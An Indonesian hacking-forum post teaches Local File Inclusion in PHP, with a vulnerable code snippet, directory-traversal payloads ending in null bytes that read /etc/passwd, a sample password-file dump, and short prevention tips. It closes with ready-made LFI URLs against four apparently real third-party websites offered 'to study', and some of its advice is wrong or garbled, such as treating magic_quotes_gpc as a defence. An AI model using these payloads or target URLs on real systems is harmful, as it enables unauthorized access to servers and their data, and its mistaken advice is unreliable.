sebelumnya minta maap kalo postingan cakill
always selalu cupu karena because cakill juja msh belajar...
saya rasa kita sering mendengar bugs LFI disini saya coba menjelaskan apa itu LFI
LFI adalah sebuah lubang pada site di mana attacker bisa mengakses semua file
di dalam server hanya dengan menggunakan URL
sekarang perhatikan script di bawah ini yg menyebabkan terjadinya bugs LFI
$page=$_GET[page];
include(page);
?>
misalkan file ini disimpan dengan nama surabayahackerlink.php di dalam direktori t3r5354t.jika di jalankan di browser akan seperti ini www.target.com/t3r5354t/surabayahackerlink.php dan file surabayahackerlink.php akan muncul
bagaimana jika kita berada di halaman utama yaitu index.php kita ingin menampilkan file surabayahackerlink.php anda tinggal mengetikan seperti ini
www.target.com/index.php?page=t3r5354t/surabayahackerlink.php
misalkan file index.php berada di dalam direktori t3r5354t www.target.com/t3r5354t/index.php dan surabayahackerlink.php di www.target.com/surabayahackerlink.php
Bagaimana kita bisa mengakses surabayahackerlink.php jika kita sekarang berada di direktori www.target/t3r5354t/index.php?
perhatikan bahwa dalam perintah command line pada linux dengan memberikan perintah ../ akan memindahkan direktori.
untuk dapat mengakses file surabayahackerlink.php dengn menggunakan perintah "../" untuk mundur satu direktori
http://www.target.com/t3r5354t/index.ph...../surabayahackerlink.php
jika server www.target.com UNIX atau LINUX maka kita dapat melihat password file dengan masuk ke direktori /etc/passwd/.
contoh:
www.vtarget.com/index.php?page=../etc/passwd%00
www.vtarget.com/index.php?page=../../etc/passwd%00
www.vtarget.com/index.php?page=../../../etc/passwd%00
www.vtarget.com/index.php?page=../../../../etc/passwd%00
www.vtarget.com/index.php?page=../../../../../../../etc/passwd%00
[color=#ff0000]jika berhasil tampilannya akan seperti ini:[/color]
root:x:0:0:root:/root:/bin/bash man:x:6:12:man:/var/cache/man:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh www-data:x:99:99:www-data:/var/www:/bin/sh ocuser:x:43:600:oneclick-user:/:/bin/false jimdo:x:45:99:jimdo-user:/:/bin/false sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:111:101:MySQL:/usr/local/mysql: dummywwwexecuser:x:1000:600:Dummy WWW User:/nonexistent:/bin/false nobody:x:655:65534:nobody:/nonexistent:/bin/sh u47884178:x:948761:600:2265:/kunden/homepages/42/d231388374/htdocs:/usr/bin/rssh u47900471:x:953199:600:2293:/kunden/homepages/16/d231520371/htdocs:/usr/bin/rssh p47872245:x:942884:600:2197:/kunden/homepages/35/d231292205/htdocs:/usr/bin/rssh u47871653:x:931009:600:2181:/kunden/homepages/10/d231286446/htdocs:/usr/bin/rssh u47880159:x:943044:600:1229:/kunden/homepages/35/d231356783/htdocs:/usr/bin/rssh u47886318:x:943216:600:2263:/kunden/homepages/35/d231405287/htdocs:/usr/bin/rssh u47913397:x:929661:600:2265:/kunden/homepages/8/d231634761/htdocs:/usr/bin/rssh
fungsi-fungsi yang dapat menyebabkan LFI:
include();
include_once();
require();
require_once();
Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
[color=#ff0000]-> [Pencegahan ]<[/color]
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server web Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
[color=#ff0000]ini ada beberapa contoh LFI silahkan untuk di pelajari[/color]
http://www.cabaretelanguage.com/index.php?language=../../../../../../etc/passwd%00
http://www.kolkovna-group.cz/index.php?language=../../../../../etc/passwd%00
http://bgnauka.com/index.php?mod=../../../../etc/passwd%00
http://www.musique-loisir.fr/index.php?Mod=../../../../etc/passwd
sekali lagi maap-maap di kata iiak juragan
kalo cakill rusuh-rusuh "DELETE" aja kagak napa² kok
cakill redho dunia akherat..:):)
maacih sebelumnya...